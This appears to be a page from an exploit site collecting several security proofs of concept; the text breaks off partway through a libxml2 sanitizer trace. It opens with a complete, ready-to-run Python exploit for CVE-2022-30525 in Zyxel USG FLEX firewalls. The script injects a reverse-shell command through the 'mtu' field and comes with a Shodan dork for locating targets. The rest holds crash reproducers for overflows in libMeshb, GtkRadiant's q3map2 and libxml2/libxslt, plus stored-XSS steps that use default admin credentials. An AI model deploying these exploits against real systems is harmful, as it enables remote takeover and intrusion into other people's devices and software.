Latest exploits :: CodePwn

<pre><code># Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800" # Date: May 18th 2022 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://www.zyxel.com # Version: ZLD5.00 thru ZLD5.21 # Tested on: Linux # CVE: CVE-2022-30525 from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import json import base64 import requests import argparse parser = argparse.ArgumentParser( prog="CVE-2022-30525.py", description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444", ) parser.add_argument("-u", dest="url", help="Specify target URL") parser.add_argument("-r", dest="host", help="Specify Remote host") parser.add_argument("-p", dest="port", help="Specify Remote port") args = parser.parse_args() banner = ( "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "biA6KSApCg==" ) def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) if None in vars(args).values(): print(f"[!] Please enter all parameters !") parser.print_help() sys.exit() if "http" not in args.url: args.url = "https://" + args.url args.url += "/ztp/cgi-bin/handler" exploit(args.url, args.host, args.port) def exploit(url, host, port): headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Content-Type": "application/json", } data = { "command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";', "data": "hi", } requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}") try: response = requests.post( url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 ) except (KeyboardInterrupt, requests.exceptions.Timeout): print("[!] Bye Bye hekcer !") sys.exit(1) finally: try: print("[!] Can't exploit the target ! Code :", response.status_code) except: print("[!] Enjoy your shell !!!") if __name__ == "__main__": main() </code></pre>

<pre><code>===== Intro ===== libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format and specially crafted .mesh files could allow for arbitrary code execution. ===== Repro ===== No magic bytes or valid header necessary as the bug appears to be an unbounded fscanf() processing mesh headers. echo -ne `perl -e 'print "B" x 2176'` > test.mesh ======== Debugger ======== (gdb) r test.mesh /tmp/empty.mesh Starting program: mesh2poly test.mesh /tmp/empty.mesh *** stack smashing detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79 #2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26 #4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24 #5 0x000055555555b5d2 in GmfOpenMesh () #6 0x4242424242424242 in ?? () #7 0x0000000000000000 in ?? () (gdb) exploitable Description: Stack buffer overflow Short description: StackBufferOverflow (6/22) Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1 Exploitability Classification: EXPLOITABLE Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable. Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22) This also affects the python wrapper library pymeshb. >>> import pymeshb >>> pymeshb.read('test.mesh') *** stack smashing detected ***: terminated Aborted (core dumped) === Fix === libMeshb v7.62 - https://github.com/LoicMarechal/libMeshb/commit/8cd68c54e0647c0030ae4506a225ad4a2655c316 </code></pre>

<pre><code># Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS) #### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS) #### Exploit Author: webraybtl@webray.com.cn inc #### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html #### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code #### Version: Product Show Room Site 1.0 #### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql #### Description Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS. #### Payload used: `<script>alert(111)</script>` #### Proof of Concept 1. Login the CMS. Default Admin Access Username: admin Password: admin123 1. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button 2. Put XSS payload (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png) 3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert. ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png) ------- # Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS) #### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS) #### Exploit Author: webraybtl@webray.com.cn inc #### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html #### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code #### Version: Product Show Room Site 1.0 #### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql #### Description Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS. #### Payload used: `<script>alert(111)</script>` #### Proof of Concept 1. Login the CMS. Default Admin Access Username: admin Password: admin123 1. Open Page http://172.24.5.107/psrs/?p=contact 2. Put XSS payload (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png) ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png) 4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert. ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png) </code></pre>

<pre><code>===== Intro ===== GtkRadiant is a cross-platform level editor software for idtech game engines such as Quake. It comes with data authoring tools and a BSP map compiler called q3map2 which parses MAP files. The code has been around for a long time and uses unsafe string copy and format functions. A buffer overflow was discovered in the map compiler that occurs when parsing malformed MAP files with large shader image names that could allow for arbitrary code execution. Various projects also use or have forked the q2map2 code into their projects such as DeepMind Lab and other 3D or game related codebases. ===== Repro ===== $ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 55'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_sprintf.map $ xxd crash_sprintf.map 00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28 //.{.a p s 0.{.( 00000010: 2034 2032 2034 2029 2028 2034 2038 2034 4 2 4 ) ( 4 8 4 00000020: 2029 2028 2034 2034 2034 2029 2042 4242 ) ( 4 4 4 ) BBB 00000030: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000040: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000050: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000060: 4242 4242 2035 2030 2034 2030 207d 0a BBBB 5 0 4 0 }. $ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 64'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_strcpy.map $ xxd crash_strcpy.map 00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28 //.{.a p s 0.{.( 00000010: 2034 2032 2034 2029 2028 2034 2038 2034 4 2 4 ) ( 4 8 4 00000020: 2029 2028 2034 2034 2034 2029 2042 4242 ) ( 4 4 4 ) BBB 00000030: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000040: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000050: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB 00000060: 4242 4242 4242 4242 4242 4242 4220 3520 BBBBBBBBBBBBB 5 00000070: 3020 3420 3020 7d0a 0 4 0 }. ======== Debugger ======== (gdb) r crash_sprintf.map Starting program: GtkRadiant/build/release/q3map2/q3map2 crash_sprintf.map [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 2.5.17 threads: 4 Q3Map - v1.0r (c) 1999 Id Software Inc. Q3Map (ydnar) - v2.5.17 GtkRadiant - v1.6.6 Jan 9 2022 20:51:50 We're still here VFS Init: /home/test/.q3a/baseq3/ VFS Init: GtkRadiant/build/release//baseq3/ --- BSP --- Loading crash_sprintf.map entering crash_sprintf.map *** buffer overflow detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff78bb859 in __GI_abort () at abort.c:79 #2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26 #4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28 #5 0x00007ffff791e1cf in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at iovsprintf.c:35 #6 0x00007ffff792b1a4 in __GI__IO_default_xsputn (n=<optimized out>, data=<optimized out>, f=<optimized out>) at libioP.h:948 #7 __GI__IO_default_xsputn (f=0x7fffffffd680, data=<optimized out>, n=55) at genops.c:370 #8 0x00007ffff791027c in __vfprintf_internal (s=s@entry=0x7fffffffd680, format=format@entry=0x5555555dd35a "textures/%s", ap=ap@entry=0x7fffffffd7c0, mode_flags=mode_flags@entry=6) at ../libio/libioP.h:948 #9 0x00007ffff791e279 in __vsprintf_internal (string=0x7fffffffd930 "textures/", 'B' <repeats 54 times>, maxlen=<optimized out>, format=0x5555555dd35a "textures/%s", args=args@entry=0x7fffffffd7c0, mode_flags=6) at iovsprintf.c:95 #10 0x00007ffff79c6edb in ___sprintf_chk (s=<optimized out>, flag=<optimized out>, slen=<optimized out>, format=<optimized out>) at sprintf_chk.c:40 #11 0x00005555555a35de in ParseBrush () #12 0x00005555555a464f in LoadMapFile () #13 0x000055555559b824 in BSPMain () #14 0x000055555555f935 in main () (gdb) r crash_strcpy.map ... *** buffer overflow detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff78bb859 in __GI_abort () at abort.c:79 #2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26 #4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28 #5 0x00007ffff79c6cc6 in __strcpy_chk (dest=0x7fffffffd8f0 "", src=0x5555556af480 <token> 'B' <repeats 64 times>, destlen=64) at strcpy_chk.c:30 #6 0x00005555555a35ab in ParseBrush () #7 0x00005555555a464f in LoadMapFile () #8 0x000055555559b824 in BSPMain () #9 0x000055555555f935 in main () </code></pre>

<pre><code>libxml2: heap-buffer-overflow in xmlBufAdd libxml2 is vulnerable to a heap-buffer-overflow when xmlBufAdd is called on a very large buffer: ``` int xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) { unsigned int needSize; [..] needSize = buf->use + len + 2; (A) if (needSize > buf->size){ [..] if (!xmlBufResize(buf, needSize)){ xmlBufMemoryError(buf, \"growing buffer\"); return XML_ERR_NO_MEMORY; } } [..] memmove(&buf->content[buf->use], str, len*sizeof(xmlChar)); (C) buf->use += len; buf->content[buf->use] = 0; [..] } ``` For large buffers with `buf->use` and `buf->size` close to 2**32, the calculation in *A* can overflow, resulting in a small value for needSize. This will skip the reallocation of the buffer in *B* and can lead to an out-of-bounds write in *C*. One way to trigger this bug is to call `xmlNodeGetContent` on a node with multiple large child elements. This triggers the overflow when `xmlBufGetNodeContent` iterates through its children to add their content to the buffer. Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. If XSLT is used, large nodes can be created dynamically and `XML_PARSE_HUGE` isn't necessary. _Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don't handle inputs larger than 4GB correctly and fuzzers won't trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._ Proof of Concept: XML only (we use \u2013xpath only to trigger a call to xmlNodeGetContent): ``` $ python3 -c 'print(\"<test>\ \" + (\"\" + \"A\"*(2**30) + \"\ \")*4 + \"</test>\ \")' > /tmp/huge.xml $ ./xmllint --huge --xpath '/test[string-length() < \"4\"]' /tmp/huge.xml ================================================================= ==93182==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f0087e0780f at pc 0x00000049c682 bp 0x7ffee51cc270 sp 0x7ffee51cba38 WRITE of size 1073741824 at 0x7f0087e0780f thread T0 #0 0x49c681 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681) #1 0x6ee851 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5 #2 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33 #3 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c #4 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16 #5 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16 #6 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17 #7 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22 #8 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6 #9 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15 #10 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c #11 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26 #12 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26 #13 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2 #14 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5 #15 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11 #16 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9 #17 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7 #18 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16 #19 0x420609 in _start (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x420609) 0x7f0087e0780f is located 0 bytes to the right of 3221225487-byte region [0x7effc7e07800,0x7f0087e0780f) allocated by thread T0 here: #0 0x49d0b3 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49d0b3) #1 0x6eddb3 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26 #2 0x6ee7f8 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14 #3 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33 #4 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c #5 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16 #6 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16 #7 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17 #8 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22 #9 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6 #10 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15 #11 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c #12 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26 #13 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26 #14 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2 #15 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5 #16 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11 #17 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9 #18 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7 #19 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681) in __asan_memmove Shadow bytes around the buggy address: 0x0fe090fb8eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe090fb8ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe090fb8ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe090fb8ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe090fb8ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe090fb8f00: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe090fb8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe090fb8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe090fb8f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe090fb8f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fe090fb8f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==93182==ABORTING ``` XSLT version (no XML_PARSE_HUGE needed) ``` <?xml version=\"1.0\"?> <test-cases> <test-case length=\"2048\">A</test-case> </test-cases> \u221a fwilhelm2 libxslt % cat poc.xslt <?xml version=\"1.0\"?> <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:str=\"http://exslt.org/strings\" xmlns:exsl=\"http://exslt.org/common\" exclude-result-prefixes=\"str\"> <xsl:output indent=\"yes\"/> <xsl:template match=\"test-cases\"> <test-results> <xsl:apply-templates select=\"test-case\"/> </test-results> </xsl:template> <xsl:template match=\"test-case\"> <test-result> <xsl:variable name=\"padding\"> <xsl:value-of select=\"str:padding(@length)\"/> </xsl:variable> <xsl:variable name=\"l1\"> <xsl:value-of select=\"concat($padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding)\"/> </xsl:variable> <xsl:variable name=\"l2\"> <xsl:value-of select=\"concat($l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1)\"/> </xsl:variable> <xsl:variable name=\"l3\"> <xsl:value-of select=\"concat($l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2)\"/> </xsl:variable> <xsl:variable name=\"l4\"> <xsl:value-of select=\"concat($l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3)\"/> </xsl:variable> <xsl:variable name=\"l5\"> <xsl:value-of select=\"concat($l4,$l4,$l4,$l4,$l4,$l4,$l4,$l4)\"/> </xsl:variable> <xsl:variable name=\"temp\"> <a><xsl:copy-of select=\"$l5\"/></a> <a><xsl:copy-of select=\"$l5\"/></a> <a><xsl:copy-of select=\"$l5\"/></a> <a><xsl:copy-of select=\"$l5\"/></a> </xsl:variable> <foo> <xsl:value-of select=\"string-length($temp)\"/> </foo> </test-result> </xsl:template> </xsl:stylesheet> \u221a fwilhelm2 libxslt % ./xsltproc/xsltproc poc.xslt poc.xml ================================================================= ==244487==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fe4cc4ee80c at pc 0x0000004b37d2 bp 0x7ffd8a145aa0 sp 0x7ffd8a145268 WRITE of size 1073741824 at 0x7fe4cc4ee80c thread T0 #0 0x4b37d1 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1) #1 0x884dc1 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5 #2 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33 #3 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7 #4 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c #5 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16 #6 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12 #7 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8 #8 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21 #9 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5 #10 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17 #11 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26 #12 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2 #13 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11 #14 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5 #15 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11 #16 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11 #17 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17 #18 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5 #19 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2 #20 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2 #21 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17 #22 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5 #23 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2 #24 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3 #25 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2 #26 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5 #27 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c #28 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6 #29 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16 #30 0x437759 in _start (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x437759) 0x7fe4cc4ee80c is located 0 bytes to the right of 3221225484-byte region [0x7fe40c4ee800,0x7fe4cc4ee80c) allocated by thread T0 here: #0 0x4b4203 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b4203) #1 0x8842e0 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26 #2 0x884d30 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14 #3 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33 #4 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7 #5 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c #6 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16 #7 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12 #8 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8 #9 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21 #10 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5 #11 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17 #12 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26 #13 0x7ee321 in xmlXPathRunEval 